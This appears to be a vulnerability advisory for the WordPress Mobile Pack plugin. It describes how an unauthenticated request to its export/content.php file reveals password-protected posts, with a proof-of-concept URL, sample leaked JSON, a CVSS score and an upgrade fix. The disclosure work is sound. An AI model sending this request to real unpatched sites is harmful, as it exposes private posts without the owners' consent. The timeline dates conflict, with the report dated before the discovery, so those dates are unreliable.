Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts


Last revised:

WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity None
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

  1. Create a password-protected post
  2. Enable WordPress Mobile Pack
  3. Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
  4. Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”

Example output:

x (
        "articles": [
                "id": 849,
                "title": "Secret post",
                "timestamp": 1406231170,
                "author": "admin",
                "date": "Thu, Jul 24, 2014, 19:46",
                "link": "http://wp.local/?p=849",
                "image": "",
                "description": "<p>HUSH THIS IS A SECRET</p>n",
                "content": "",
                "category_id": 1,
                "category_name": "Uncategorized"

Advisory timeline

  • 2014-07-24: Discovered
  • 2014-07-13: Reported to developer via email
  • 2014-08-19: Developer reported the issue fixed
  • 2014-08-20: Advisory published

Mitigation/further actions

Upgrade to version 2.0.2 or later